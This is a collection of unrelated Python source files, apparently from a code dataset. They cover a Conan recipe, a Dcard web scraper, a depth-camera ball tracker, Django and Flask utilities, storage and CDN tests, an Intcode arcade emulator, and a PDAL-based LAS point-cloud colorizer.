"Imath only contains data starting from version 3. Use OpenEXR-2 for Imath-2"
)
else:
tools.get(
f"https://github.com/AcademySoftwareFoundation/Imath/archive/v{self.version}.tar.gz"
)
os.rename(f"Imath-{self.version}", self._source_subfolder)
def _configure_cmake(self):
if self._cmake:
return self._cmake
with tools.environment_append(tools.RunEnvironment(self).vars):
self._cmake = CMake(self)
self._cmake.definitions["PYTHON"] = "ON"
self._cmake.configure(source_folder=self._source_subfolder)
return self._cmake
def build(self):
if not self._is_dummy():
cmake = self._configure_cmake()
cmake.build()
def package(self):
if self._is_dummy():
self.copy("imath-2-is-a-dummy-package.txt")
else:
self.copy("LICENSE.md", src=self._source_subfolder, dst="licenses")
cmake = self._configure_cmake()
cmake.install()
def package_info(self):
if self._is_dummy():
self.user_info.is_dummy = True
return
self.user_info.is_dummy = False
self.cpp_info.requires.append("python::PythonLibs")
self.cpp_info.requires.append("boost::python")
pymajorminor = self.deps_user_info["python"].python_interp
self.env_info.PYTHONPATH.append(
os.path.join(self.package_folder, "lib", pymajorminor, "site-packages")
)
self.env_info.CMAKE_PREFIX_PATH.append(
os.path.join(self.package_folder, "lib", "cmake")
)
| 1.328125 | 1 |
Dcard.py | funkman56/Dcard | 0 | 47748 | # -*- coding: utf-8 -*-
"""
Created on Mon Jul 1 23:11:03 2019
@author: Relieak
"""
'''
Dcard top-30 trending article search
Written using BeautifulSoup only
'''
from bs4 import BeautifulSoup
import requests
import re
url = "https://www.dcard.tw/f/"
html = requests.get(url)
html.encoding = "utf-8"
#print(html.text)
sp = BeautifulSoup(html.text,"html.parser")
#print(sp.prettify()) # prettified output is easier to analyse
#data = sp.select(".PostEntry_root_V6g0rd")
data = sp.select(".PostList_entry_1rq5Lf") # to read content inside a tag you must select the enclosing tag first, otherwise it is not found, e.g. for href select <div before <a
#print(data[0])
#for link in data[1].find_all("a",{"class" : "PostEntry_root_V6g0rd"}) :
#
# #print(link)
#
# http = link.get("href")
#
# print("https://www.dcard.tw%s" %(http))
while True :
try :
        number = input("~~~Welcome to the Dcard top-30 trending article search~~~\n""\nWhich article would you like to read? (press Enter to quit)>> ")
if number == "" :
break
elif 0 < int(number) <= 30 :
try :
for i in range(int(number)-1,int(number)) :
data1 = data[i].find_all("h3",{"class" : "Title__Text-v196i6-0 gmfDU"})
data2 = data[i].find_all("div",{"class" : "PostEntry_excerpt_2eHlNn"})
data3 = data[i].find_all("div",{"class" : "ActionBar__LikeCount-pwz3il-1 cGEHtj"})
data4 = data[i].find_all("span",{"class" : "ActionBar__CommentWrapper-pwz3il-5 hkpJwJ"})
data5 = data[i].find_all("span",{"class" : "Header__PublishedDateTime-xvcbwe-3 MDszy"})
print("")
print("第%d則" %(int(number)))
print("標題 :",data1[0].text)
print("簡介 :",data2[0].text)
print("表達心情數 :",data3[0].text)
# .strip() 方法用於移除字符串頭尾指定的字符(默認為空格或換行符)或字符序列 -->文字<--
print("回應數 :",data4[0].text.strip("回應"))
print("發表時間 :",data5[0].text)
# 搜尋標簽中的內容的方法 #href
for link in data[i].find_all("a",{"class" : "PostEntry_root_V6g0rd"}) :
http = link.get("href")
#print(http)
                        # regular expressions
                        A = re.compile("[0-9]+") # matches any string of digits
                        B = re.compile("[A-Za-z0-9\./_]+") # matches any mix of digits, letters and underscores; could also be written with \w
                        # search(string) returns the first substring that matches the regular expression
Search1 = A.search(http)
                        Search2 = B.search(http) # strips the Chinese characters at the end of the URL
#print(Search1)
#print(Search2)
print("文章ID :",Search1.group()) #傳回儲存在match物件中的值 group()
print("網頁 :https://www.dcard.tw%s" %(Search2.group()))
print("")
except :
""" 若文章簡介開頭是 "前情提要" 會搜尋不到內文 "PostEntry_excerpt_2eHlNn" 產生錯誤 須去搜尋 "PostEntry_reply_1oU-6z" """
data2 = data[i].find_all("div",{"class" : "PostEntry_reply_1oU-6z"})
data3 = data[i].find_all("div",{"class" : "ActionBar__LikeCount-pwz3il-1 cGEHtj"})
data4 = data[i].find_all("span",{"class" : "ActionBar__CommentWrapper-pwz3il-5 hkpJwJ"})
data5 = data[i].find_all("span",{"class" : "Header__PublishedDateTime-xvcbwe-3 MDszy"})
print("簡介 :",data2[0].text)
print("表達心情數 :",data3[0].text)
print("回應數 :",data4[0].text.strip("回應"))
print("發表時間 :",data5[0].text)
for link in data[i].find_all("a",{"class" : "PostEntry_root_V6g0rd"}) :
http = link.get("href")
A = re.compile("[0-9]+")
B = re.compile("[A-Za-z0-9\./_]+")
Search1 = A.search(http)
Search2 = B.search(http)
print("文章ID :",Search1.group())
print("網頁 :https://www.dcard.tw%s" %(Search2.group()))
print("")
else :
print("")
print("只能搜尋前30篇文章喔!!")
except :
print("")
print("輸入錯誤請重新輸入!!!")
| 2.046875 | 2 |
src/vision/stereo.py | hb-jones/rp1-ros | 0 | 47876 | <filename>src/vision/stereo.py
from logging import config
import threading, cv2, time, json
from .stereocam import StereoCam
from .vision_config import BallConfig, StereoConfig, MonocularConfig
from . import preprocessing, trajectory_estimation, monocular
class Stereo(monocular.Monocular):
def __init__(self, publisher_func, mode: str = "all", trajectory = None): # mode determines if a trajectory is calculated
self.camera: StereoCam = StereoCam(StereoCam.set_depth_rs_config())
        self.publisher_func = publisher_func  # callback used to publish detection results
self.mode = mode
self.trajectory = trajectory
def main_loop(self): #TODO
while self.loop_running:
self.image_id += 1
if self.debug_mode:
self.debug_currrent = True #Tells image saver that it can start saving images
raw_frame, timestamp = self.camera.get_next_depth_image()
preprocessed_frame = self.preprocess(raw_frame)
moment_result = trajectory_estimation.get_target_pixel_position_moment(preprocessed_frame)
if moment_result is False:
#print(f"Invalid Moment: Image {self.image_id}") #Fires if image has no ball
continue
pixel_coords, mass, pixel_diameter = moment_result
if mass<StereoConfig.min_mass:
#print(f"Mass {mass}") #Fires if image is too small
continue
#TODO this should remove incomplete detections
if not (preprocessed_frame[pixel_coords[1],-1] == 0 and preprocessed_frame[pixel_coords[1],0] == 0 and preprocessed_frame[0,pixel_coords[0]] == 0 and preprocessed_frame[-1,pixel_coords[0]] == 0):
print("Incomplete Ball")
continue
#print(pixel_coords)
# draw the center and diameter of the circle
com_frame = cv2.applyColorMap(cv2.convertScaleAbs(raw_frame, alpha=0.03), cv2.COLORMAP_JET)
com_frame = cv2.circle(com_frame,pixel_coords,2,(0,0,255),3)
com_frame = cv2.circle(com_frame,pixel_coords,int(pixel_diameter/2),(0,0,255),3)
self.save_image(com_frame, "com_frame")
if self.mode == "all": #TODO
distance = raw_frame[pixel_coords[1]][pixel_coords[0]]+BallConfig.ball_diameter*1000/2
cartestian_coord_camera_frame = self.camera.get_coord_of_depth_frame_pixel(pixel_coords, distance)
cartestian_coord_world_frame = self.transform_camera_frame_to_world_frame(cartestian_coord_camera_frame)
self.last_update_type = self.mode
self.last_update = time.time()
self.pixel_coords = pixel_coords
self.pixel_diameter = pixel_diameter
self.norm_coords = (0,0)
self.distance = distance
self.cartesian_coords = cartestian_coord_world_frame
coords = cartestian_coord_world_frame
self.coord = {"x":coords[0],"y":coords[1],"z":coords[2], "timestamp":timestamp}
#print(self.distance) #TODO DEBUG
self.publisher_func(self) #TODO call this after updating self
if self.debug_mode and self.debug_type == "oneshot":
self.debug_mode = False
self.debug_currrent = False
self.camera.stop_stream()
def preprocess(self, raw_frame):
#Save raw image
self.save_image(raw_frame, "raw_frame")
#Crop frame
cropped_frame = preprocessing.crop(raw_frame, StereoConfig.crop_topleft, StereoConfig.crop_bottomright)
self.save_image(cropped_frame, "cropped_frame")
#Distance crop
distance_cropped_frame = preprocessing.distance_crop(cropped_frame, StereoConfig.dist_crop_min, StereoConfig.dist_crop_max)
self.save_image(distance_cropped_frame, "distance_cropped_frame")
#Remove disconnected masses
opened_frame = preprocessing.morph_open(distance_cropped_frame, StereoConfig.open_kernal_size)
self.save_image(opened_frame, "opened_frame")
#Fill holes in ball
closed_frame = preprocessing.morph_close(opened_frame, StereoConfig.close_kernal_size)
self.save_image(closed_frame, "closed_frame")
#Threshold to binary
thresholded_frame = preprocessing.stereo_threshold(closed_frame)
self.save_image(thresholded_frame, "thresholded_frame")
return thresholded_frame
def transform_camera_frame_to_world_frame(self, coordinate): #TODO
#RS local axes are defined with X right, Y down, Z towards facing direction.
#These need to be converted to the same axes as robot platform uses.
#X forward, Y left (TODO check positive value is left) and Z up
x_l = coordinate[2]/1000 #z_rs becomes x
y_l = -coordinate[0]/1000 #-x_rs becomes y
z_l = -coordinate[1]/1000 #-y_rs becomes z
rotaton_matrix = StereoConfig.rotation_matrix
x_rotated = x_l*rotaton_matrix[0][0]+y_l*rotaton_matrix[1][0]+z_l*rotaton_matrix[2][0]
y_rotated = x_l*rotaton_matrix[0][1]+y_l*rotaton_matrix[1][1]+z_l*rotaton_matrix[2][1]
z_rotated = x_l*rotaton_matrix[0][2]+y_l*rotaton_matrix[1][2]+z_l*rotaton_matrix[2][2]
x_translated = x_rotated-StereoConfig.camera_position[0]
y_translated = y_rotated-StereoConfig.camera_position[1]
z_translated = z_rotated-StereoConfig.camera_position[2]
world_coord = [x_translated, y_translated, z_translated]
#print(f"Coord: {[x_l, y_l, z_l]}, {world_coord:}")
#print(f"{x_translated:3f},{y_translated:3f},{z_translated:3f}")
return world_coord
def record_singe_image_set(self):
self.debug_type = "oneshot"
self.debug_mode = True
def save_image(self, frame, image_name): #TODO async func to save images to a file
#needs to set filename based on image id at start to ensure it has not been updated.
if frame is not False and image_name == "thresholded_frame":
self.debug_frame_output = frame
return
def test_publisher_pixel_coordinate(stereo: Stereo):
"""Test file that saves coords to a json file for testing with traj predictor"""
filename = "vision/log/coords.json"
if stereo.coord is not None:
with open(filename, "r+") as file:
try:
data = json.load(file)
except:
data = []
data.append(stereo.coord)
file.seek(0)
json.dump(data, file)
return
if __name__ == "__main__":
stereo = Stereo(test_publisher_pixel_coordinate)
stereo.debug_mode = True
stereo.debug_type = "cont"
stereo.start_loop()
time.sleep(2)
while True:
cv2.imshow("Colour Image", stereo.debug_frame_output)
# Press q if you want to end the loop
if cv2.waitKey(1) & 0xFF == ord('q'):
break
stereo.loop_running = False
| 1.945313 | 2 |
django_discord_connector/admin.py | DubClub-win/django-discord-connector | 2 | 48004 | <gh_stars>1-10
from django.contrib import admin
from django_discord_connector.models import DiscordClient, DiscordToken, DiscordGroup, DiscordChannel, DiscordUser
from django_discord_connector.tasks import sync_discord_groups
from django.apps import apps
def update_discord_groups(modeladmin, request, queryset):
sync_discord_groups()
update_discord_groups.short_description="Update Discord groups from Discord Server"
# Register your models here.
admin.site.register(DiscordGroup)
admin.site.register(DiscordChannel)
admin.site.register(DiscordUser)
if apps.is_installed('django_singleton_admin'):
# Highly Recommended: https://github.com/porowns/django-singleton-admin
from django_singleton_admin.admin import DjangoSingletonModelAdmin
@admin.register(DiscordClient)
class DiscordClientAdmin(DjangoSingletonModelAdmin):
fieldsets = (
('General Settings', {
'fields': ('callback_url', 'server_id', 'client_id', 'client_secret', 'bot_token', 'invite_link', 'name_enforcement_schema')
}),
('Advanced Settings', {
'classes': ('collapse', 'open'),
'fields': ('api_endpoint', 'base_uri', 'token_uri', 'token_revoke_uri')
}),
) | 1.390625 | 1 |
tests/test_store_creation.py | bjoernmeier/storefact | 16 | 48132 | <gh_stars>10-100
from storefact._store_creation import create_store
import pytest
def test_create_store_azure(mocker):
    # Mock HAzureBlockBlobStore also here, because otherwise it will try to inherit from
# the mock object `mock_azure` created below, which will fail.
mock_hazure = mocker.patch("storefact._hstores.HAzureBlockBlobStore")
mock_azure = mocker.patch("simplekv.net.azurestore.AzureBlockBlobStore")
create_store(
"azure",
{
"account_name": "ACCOUNT",
"account_key": "KEY",
"container": "cont_name",
"create_if_missing": True,
},
)
mock_azure.assert_called_once_with(
checksum=True,
conn_string="DefaultEndpointsProtocol=https;AccountName=ACCOUNT;AccountKey=KEY",
container="cont_name",
create_if_missing=True,
max_connections=2,
public=False,
socket_timeout=(20, 100),
max_block_size=4194304,
max_single_put_size=67108864,
)
mock_hazure.assert_not_called()
def test_create_store_hazure(mocker):
mock_hazure = mocker.patch("storefact._hstores.HAzureBlockBlobStore")
create_store(
"hazure",
{
"account_name": "ACCOUNT",
"account_key": "KEY",
"container": "cont_name",
"create_if_missing": True,
},
)
mock_hazure.assert_called_once_with(
checksum=True,
conn_string="DefaultEndpointsProtocol=https;AccountName=ACCOUNT;AccountKey=KEY",
container="cont_name",
create_if_missing=True,
max_connections=2,
public=False,
socket_timeout=(20, 100),
max_block_size=4194304,
max_single_put_size=67108864,
)
def test_create_store_azure_inconsistent_params():
with pytest.raises(
Exception, match="create_if_missing is incompatible with the use of SAS tokens"
):
create_store(
"hazure",
{
"account_name": "ACCOUNT",
"account_key": "KEY",
"container": "cont_name",
"create_if_missing": True,
"use_sas": True,
},
)
def test_create_store_hs3(mocker):
mock_hs3 = mocker.patch("storefact._boto._get_s3bucket")
mock_hbotostores = mocker.patch("storefact._hstores.HBotoStore")
create_store(
"hs3",
{
'host': u'endpoint:1234',
'access_key': u'access_key',
'secret_key': u'secret_key',
'bucket': u'bucketname',
},
)
mock_hs3.assert_called_once_with(
host=u'endpoint:1234',
access_key=u'access_key',
secret_key=u'secret_key',
bucket=u'bucketname',
)
def test_create_store_s3(mocker):
mock_s3 = mocker.patch("storefact._boto._get_s3bucket")
mock_hbotostores = mocker.patch("storefact._hstores.HBotoStore")
create_store(
"s3",
{
'host': u'endpoint:1234',
'access_key': u'access_key',
'secret_key': u'secret_key',
'bucket': u'bucketname',
},
)
mock_s3.assert_called_once_with(
host=u'endpoint:1234',
access_key=u'access_key',
secret_key=u'secret_key',
bucket=u'bucketname',
)
def test_create_store_hfs(mocker):
mock_hfs = mocker.patch("storefact._hstores.HFilesystemStore")
create_store(
"hfs",
{
'type': 'hfs',
'path': 'this/is/a/relative/path',
'create_if_missing': True
},
)
mock_hfs.assert_called_once_with('this/is/a/relative/path')
@pytest.mark.skip(reason="some issue here")
def test_create_store_fs(mocker):
mock_fs = mocker.patch("simplekv.fs.FilesystemStore")
create_store(
"fs",
{
'type': 'fs',
'path': 'this/is/a/relative/fspath',
'create_if_missing': True
}
)
mock_fs.assert_called_once_with('this/is/a/relative/fspath')
def test_create_store_mem(mocker):
mock_mem = mocker.patch("simplekv.memory.DictStore")
create_store(
"memory",
{'type': u'memory', 'wrap': u'readonly'},
)
mock_mem.assert_called_once_with()
def test_create_store_hmem(mocker):
mock_hmem = mocker.patch("storefact._hstores.HDictStore")
create_store(
"hmemory",
{'type': u'memory', 'wrap': u'readonly'},
)
mock_hmem.assert_called_once_with()
@pytest.mark.skip(reason="some issue here")
def test_create_store_redis(mocker):
mock_redis = mocker.patch("simplekv.memory.redisstore.RedisStore")
mock_Strictredis = mocker.patch("redis.StrictRedis")
create_store(
"redis",
{'type': u'redis', 'host': u'localhost', 'db': 2},
)
mock_Strictredis.assert_called_once_with()
def test_create_store_valueerror():
with pytest.raises(
Exception, match="Unknown store type: ABC"
):
create_store(
"ABC",
{
"account_name": "ACCOUNT",
"account_key": "KEY",
"container": "cont_name",
"create_if_missing": True,
"use_sas": True,
},
)
| 1.523438 | 2 |
day13/main.py | Floozutter/aoc-2019-speedrun | 0 | 48260 | INPUTPATH = "input.txt"
#INPUTPATH = "input-test.txt"
with open(INPUTPATH) as ifile:
raw = ifile.read()
program = tuple(map(int, raw.strip().split(",")))
from enum import Enum
class Mde(Enum):
POS = 0
IMM = 1
REL = 2
from itertools import chain, repeat, islice
from collections import defaultdict
from typing import Dict, Callable, List, Iterable, Optional, ClassVar
class Ico:
liv: bool
ptr: int
reb: int
mem: Dict[int, int]
cal: Callable[[], int]
log: List[int]
def __init__(
self,
prg: Iterable[int],
cal: Callable[[], int] = lambda: 0
) -> None:
self.liv = True
self.ptr = 0
self.reb = 0
self.mem = defaultdict(int, enumerate(prg))
self.cal = cal
self.log = list()
def get(self, mde: Mde) -> int:
if mde == Mde.POS: idx = self.mem[self.ptr]
elif mde == Mde.IMM: idx = self.ptr
elif mde == Mde.REL: idx = self.mem[self.ptr] + self.reb
self.ptr += 1
return idx
def ste(self) -> int:
if not self.liv: return 99
val = self.mem[self.get(Mde.IMM)]
opc = val % 100
mds = map(Mde, chain(map(int, reversed(str(val // 100))), repeat(0)))
opr = self.ops[opc]
opr(self, *map(self.get, islice(mds, opr.__code__.co_argcount - 1)))
return opc
def run(self) -> List[int]:
while self.liv: self.ste()
return self.log
def add(self, idx: int, jdx: int, kdx: int) -> None:
self.mem[kdx] = self.mem[idx] + self.mem[jdx]
def mul(self, idx: int, jdx: int, kdx: int) -> None:
self.mem[kdx] = self.mem[idx] * self.mem[jdx]
def inp(self, idx: int) -> None:
self.mem[idx] = self.cal()
def out(self, idx: int) -> None:
self.log.append(self.mem[idx])
def jit(self, idx: int, jdx: int) -> None:
if self.mem[idx]: self.ptr = self.mem[jdx]
def jif(self, idx: int, jdx: int) -> None:
if not self.mem[idx]: self.ptr = self.mem[jdx]
def les(self, idx: int, jdx: int, kdx: int) -> None:
self.mem[kdx] = int(self.mem[idx] < self.mem[jdx])
def equ(self, idx: int, jdx: int, kdx: int) -> None:
self.mem[kdx] = int(self.mem[idx] == self.mem[jdx])
def adj(self, idx: int) -> None:
self.reb += self.mem[idx]
def hal(self) -> None:
self.liv = False
ops: ClassVar[Dict[int, Callable[..., None]]] = {
1: add,
2: mul,
3: inp,
4: out,
5: jit,
6: jif,
7: les,
8: equ,
9: adj,
99: hal
}
from typing import Tuple
class ArcadeCabinet:
ico: Ico
index: int
screen: Dict[Tuple[int, int], int]
score: int
auto: bool
tile_to_char: ClassVar[Dict[int, str]] = {
0: " ",
1: "|",
2: "#",
3: "_",
4: "o"
}
char_to_joystick: ClassVar[Dict[str, int]] = {
"a": -1,
"s": 0,
"d": 1
}
def __init__(self, program: Iterable[int], auto: bool = True) -> None:
self.ico = Ico(program)
self.ico.cal = self
self.index = 0
self.screen = defaultdict(int)
self.score = 0
self.auto = auto
def __call__(self) -> int:
self.consume_log()
if self.auto:
return 0
else:
return self.prompt_joystick()
def __str__(self) -> str:
indexes, jndexes = zip(*self.screen)
return "\n".join(
"".join(
self.tile_to_char[self.screen[i, j]]
for j in range(min(jndexes), max(jndexes) + 1)
)
for i in range(min(indexes), max(indexes) + 1)
)
def run(self) -> None:
self.ico.run()
self.consume_log()
def consume_log(self) -> None:
while self.index < len(self.ico.log):
j, i, value = self.ico.log[self.index: self.index + 3]
if (j, i) == (-1, 0): self.score = value
else: self.screen[i, j] = value
self.index += 3
def prompt_joystick(self) -> int:
print(self)
msg = f"<{'|'.join(self.char_to_joystick)}>: "
while (j := self.char_to_joystick.get(input(msg))) is None: pass
return j
demo = ArcadeCabinet(program)
demo.run()
print(sum(1 for tile in demo.screen.values() if tile == 2))
game = ArcadeCabinet((2,) + program[1:], False)
game.run()
print(game.score)
| 2.09375 | 2 |
tests/test_cdn.py | datalogics-cgreen/server_core | 0 | 48388 | # encoding: utf-8
from nose.tools import (
eq_,
set_trace,
)
from util.cdn import cdnify
class TestCDN(object):
def unchanged(self, url, cdns):
self.ceq(url, url, cdns)
def ceq(self, expect, url, cdns):
eq_(expect, cdnify(url, cdns))
def test_no_cdns(self):
url = "http://foo/"
self.unchanged(url, None)
def test_non_matching_cdn(self):
url = "http://foo.com/bar"
self.unchanged(url, {"bar.com" : "cdn.com"})
def test_matching_cdn(self):
url = "http://foo.com/bar#baz"
self.ceq("https://cdn.org/bar#baz", url,
{"foo.com" : "https://cdn.org",
"bar.com" : "http://cdn2.net/"}
)
def test_s3_bucket(self):
# Instead of the foo.com URL we accidentally used the full S3
# address for the bucket that hosts S3. cdnify() handles this
# with no problem.
url = "http://s3.amazonaws.com/foo.com/bar#baz"
self.ceq("https://cdn.org/bar#baz", url,
{"foo.com" : "https://cdn.org/"})
def test_relative_url(self):
# By default, relative URLs are untouched.
url = "/groups/"
self.unchanged(url, {"bar.com" : "cdn.com"})
# But if the CDN list has an entry for the empty string, that
# URL is used for relative URLs.
self.ceq("https://cdn.org/groups/", url,
{"" : "https://cdn.org/"})
| 1.75 | 2 |
test/_test_sample_z.py | yiruiliu110/eegnn | 0 | 48516 | <reponame>yiruiliu110/eegnn
import torch
from torch.distributions import Gamma, Dirichlet
from estimation import compute_z
i = [[0, 1, 1, 2],
[2, 0, 2, 1]]
v_graph = [1, 1, 1, 1]
v_c = [0, 1, 1, 0]
graph = torch.sparse_coo_tensor(i, v_graph, (3, 3))
c = torch.sparse_coo_tensor(i, v_c, (3, 3))
max_K = 10
node_number = 4
w = Gamma(concentration=1., rate=1.).sample([max_K, node_number]) * 5.0
pi = Dirichlet(torch.tensor([0.5, 0.5])).sample()
z = compute_z(w, pi, c)
print(z) | 1.445313 | 1 |
pyneos/mypaths.py | kavehshamsi/neos | 0 | 48644 | <filename>pyneos/mypaths.py
import os
home_dir = os.path.expanduser('~')
neos_dir = '.' # have this point to your neos directory
neos_cmd = neos_dir + '/bin/neos'
abc_cmd = neos_dir + '/bin/abc'
abclib_path = neos_dir + '/cells/simpler.lib'
neos_bench_dir = neos_dir + '/bench/'
| 0.8125 | 1 |
SuperSafety/Utils/utils.py | BDEvan5/SuperSafety | 0 | 48772 | <reponame>BDEvan5/SuperSafety
import yaml
import csv
import os
from argparse import Namespace
import shutil
import numpy as np
from numba import njit
# Admin functions
def save_conf_dict(dictionary, save_name=None):
if save_name is None:
save_name = dictionary["agent_name"]
path = dictionary["vehicle_path"] + dictionary["agent_name"] + f"/{save_name}_record.yaml"
with open(path, 'w') as file:
yaml.dump(dictionary, file)
def load_conf(fname):
full_path = "config/" + fname + '.yaml'
with open(full_path) as file:
conf_dict = yaml.load(file, Loader=yaml.FullLoader)
conf = Namespace(**conf_dict)
# np.random.seed(conf.random_seed)
return conf
def load_yaml_dict(fname):
full_path = "config/" + fname + '.yaml'
with open(full_path) as file:
conf_dict = yaml.load(file, Loader=yaml.FullLoader)
return conf_dict
def init_file_struct(path):
if os.path.exists(path):
try:
os.rmdir(path)
except:
shutil.rmtree(path)
os.mkdir(path)
@njit(cache=True)
def limit_phi(phi):
while phi > np.pi:
phi = phi - 2*np.pi
while phi < -np.pi:
phi = phi + 2*np.pi
return phi
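if __name__ == "__main__":
    # Quick sanity check of the angle wrapper (illustrative only):
    # 3*pi/2 lies outside (-pi, pi] and should wrap to -pi/2.
    print(limit_phi(3 * np.pi / 2))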
| 1.59375 | 2 |
flask_transalchemy/core.py | gerelorant/Flask-TransAlchemy | 2 | 48900 | from flask import Flask, current_app, request
from flask_babelex import get_locale
from flask_sqlalchemy import SQLAlchemy
from flask_transalchemy.model import TranslationMixin
class TransAlchemy(object):
"""Flask-TransAlchemy extension class.
:param app: Flask application instance
    :param db: Flask-SQLAlchemy instance
    :param label_route: optional URL prefix under which label translations are served
    """
def __init__(self, app: Flask, db: SQLAlchemy, label_route: str = None):
self.app = app
self.db = db
self.model = None
self.route = label_route
if app is not None:
self.init_app(app)
def init_app(self, app: Flask):
"""Initialize extension and create `Translation` model class.
:param app: Flask application instance
"""
app.extensions["babel_alchemy"] = self
class Translation(self.db.Model, TranslationMixin):
pass
self.model = Translation
if self.route:
@self.app.route(
'/{}/<label>'.format(self.route),
endpoint='label_translations'
)
def translate(label):
return self.get_label(label, **request.args)
def set_label(self, label: str, value: str, language: str = None):
"""Save label translation in database.
:param label: Label name ('attribute' field in table)
:param value: Translated label text.
:param language: Language of translation
"""
if language is None:
language = str(get_locale())
translation = self.model(
attribute=label,
language=language,
value=value
)
self.db.session.add(translation)
self.db.session.commit()
def get_label(self, label: str, language: str = None):
"""Get translated label from database.
Labels are stored in the table without table name and record_id.
:param label: Label name ('attribute' field in table)
:param language: Language of translation
:return: Translated label text.
"""
if language is None:
language = str(get_locale())
qry = self.model.query.filter_by(
table=None,
record_id=None,
attribute=label,
language=language
)
translation = qry.first()
if translation is None:
return label
return translation.value
def set_label(label: str, value: str, language: str = None):
"""Shortcut for `BabelAlchemy.set_label()`.
:param label: Label name ('attribute' field in table)
:param value: Translated label text.
:param language: Language of translation
"""
babel_alchemy = current_app.extensions.get("babel_alchemy")
return babel_alchemy.set_label(label, value, language)
def get_label(label: str, language: str = None):
"""Shortcut for `BabelAlchemy.get_label()`.
Labels are stored in the table without table name and record_id.
:param label: Label name ('attribute' field in table)
:param language: Language of translation
:return: Translated label text.
"""
babel_alchemy = current_app.extensions.get("babel_alchemy")
return babel_alchemy.get_label(label, language)
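# Illustrative wiring sketch (not part of the extension; the import path and
# database URI below are assumptions made for the example, and Flask-BabelEx
# is assumed to be configured as usual):
#
#   from flask import Flask
#   from flask_sqlalchemy import SQLAlchemy
#   from flask_transalchemy.core import TransAlchemy
#
#   app = Flask(__name__)
#   app.config["SQLALCHEMY_DATABASE_URI"] = "sqlite://"
#   db = SQLAlchemy(app)
#   translations = TransAlchemy(app, db, label_route="labels")
#
#   with app.app_context():
#       db.create_all()
#       translations.set_label("greeting", "Hallo", language="de")
#       translations.get_label("greeting", language="de")   # -> "Hallo"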
| 1.65625 | 2 |
temp-down/application.py | scavicchio/easyWaltonTracker | 2 | 49028 | from flask import Flask, render_template, request, url_for, redirect
application = app = Flask(__name__)
@app.before_request
def check_for_maintenance():
if request.path != url_for('maintenance'):
return redirect(url_for('maintenance'))
        # Or alternatively, don't redirect
# return 'Sorry, off for maintenance!', 503
@app.route('/maintenance')
def maintenance():
return render_template('downsite.html')
# run the app.
if __name__ == "__main__":
# Setting debug to True enables debug output. This line should be
# removed before deploying a production app.
    app.run(host="0.0.0.0", port=8080, debug=True) | 1.40625 | 1
scripts/colorize/las_colorize.py | SPINLab/rijkswaterstaat-data-tools | 1 | 49156 | <gh_stars>1-10
# -*- coding: utf-8 -*-
"""
Python3
@author: <NAME>
"""
import sys
import os
import argparse
import subprocess
import json
import math
def run_pdal(path, input_path, output_path, las_srs, wms_url,
wms_layer, wms_srs, wms_version, wms_format, wms_ppm,
wms_max_image_size):
subprocess.call(['pdal', 'pipeline',
'{}/pdal_pipeline.json'.format(path),
'--readers.las.filename={}'.format(input_path),
'--filters.python.script={}/pdal_colorize.py'.format(path),
('--filters.python.pdalargs="{' +
'\\\"wms_url\\\": \\\"{}\\\",'.format(wms_url) +
'\\\"wms_layer\\\": \\\"{}\\\",'.format(wms_layer) +
'\\\"wms_srs\\\": \\\"{}\\\",'.format(wms_srs) +
'\\\"wms_version\\\": \\\"{}\\\",'.format(wms_version) +
'\\\"wms_format\\\": \\\"{}\\\",'.format(wms_format) +
'\\\"wms_ppm\\\": \\\"{}\\\",'.format(wms_ppm) +
'\\\"wms_max_image_size\\\": \\\"{}\\\"}}"'.format(wms_max_image_size)),
'--writers.las.filename={}'.format(output_path),
'--writers.las.a_srs={}'.format(las_srs)])
def process_files(input_path, output_path, las_srs,
wms_url, wms_layer, wms_srs,
wms_version, wms_format, wms_ppm,
wms_max_image_size, verbose=False):
"""
Run the pdal pipeline using the given arguments.
Parameters
----------
input : str
The path to the input LAS/LAZ file.
output : str
The path to the output LAS/LAZ file.
"""
path = os.path.dirname(os.path.realpath(__file__))
if os.path.isdir(input_path):
for i, f in enumerate(os.listdir(input_path)):
if f.endswith(".las") or f.endswith(".laz"):
las = os.path.join(input_path, f).replace('\\', '/')
if os.path.isdir(output_path):
output_path = output_path + '/' if output_path[-1] != '/' else output_path
basename, ext = os.path.splitext(f)
out = '{}{}_color{}'.format(output_path, basename, ext)
else:
basename, ext = os.path.splitext(output_path)
out = '{}_{}{}'.format(basename, i, ext)
if verbose:
print('Colorizing {} ..'.format(las))
run_pdal(path, las, out, las_srs, wms_url, wms_layer, wms_srs,
wms_version, wms_format, wms_ppm, wms_max_image_size)
else:
if verbose:
print('Colorizing {} ..'.format(input_path))
run_pdal(path, input_path, output_path, las_srs, wms_url, wms_layer,
wms_srs, wms_version, wms_format, wms_ppm, wms_max_image_size)
def argument_parser():
"""
Define and return the arguments.
"""
description = ("Colorize a las or laz file with a WMS service. "
"By default uses PDOK aerial photography.")
parser = argparse.ArgumentParser(description=description)
required_named = parser.add_argument_group('required named arguments')
required_named.add_argument('-i', '--input',
help='The input LAS/LAZ file or folder.',
required=True)
required_named.add_argument('-o', '--output',
help='The output colorized LAS/LAZ file or folder.',
required=True)
parser.add_argument('-s', '--las_srs',
help='The spatial reference system of the LAS data. (str, default: EPSG:28992)',
required=False,
default='EPSG:28992')
parser.add_argument('-w', '--wms_url',
help='The url of the WMS service to use. (str, default: https://geodata.nationaalgeoregister.nl/luchtfoto/rgb/wms?)',
required=False,
default='https://geodata.nationaalgeoregister.nl/luchtfoto/rgb/wms?')
parser.add_argument('-l', '--wms_layer',
help='The layer of the WMS service to use. (str, default: Actueel_ortho25)',
required=False,
default='Actueel_ortho25')
parser.add_argument('-r', '--wms_srs',
help='The spatial reference system of the WMS data to request. (str, default: EPSG:28992)',
required=False,
default='EPSG:28992')
parser.add_argument('-f', '--wms_format',
help='The image format of the WMS data to request. (str, default: image/png)',
required=False,
default='image/png')
parser.add_argument('-v', '--wms_version',
help='The version number of the WMS service. (str, default: 1.3.0)',
required=False,
default='1.3.0')
parser.add_argument('-p', '--wms_ppm',
help='The approximate desired pixels per meter of the requested image. (int, default: 4)',
required=False,
default=4)
parser.add_argument('-m', '--wms_max_image_size',
help='The maximum size in pixels of the largest side of the requested image. (int, default: sys.maxsize)',
required=False,
default=sys.maxsize)
parser.add_argument('-V', '--verbose', default=False, action="store_true",
help='Set verbose.')
args = parser.parse_args()
return args
def main():
args = argument_parser()
process_files(args.input, args.output, args.las_srs,
args.wms_url, args.wms_layer, args.wms_srs,
args.wms_version, args.wms_format,
args.wms_ppm, args.wms_max_image_size,
args.verbose)
if __name__ == '__main__':
main()
| 1.554688 | 2 |
astroutils/writer_module.py | nithyanandan/AstroUtils | 1 | 49284 | from blessings import Terminal
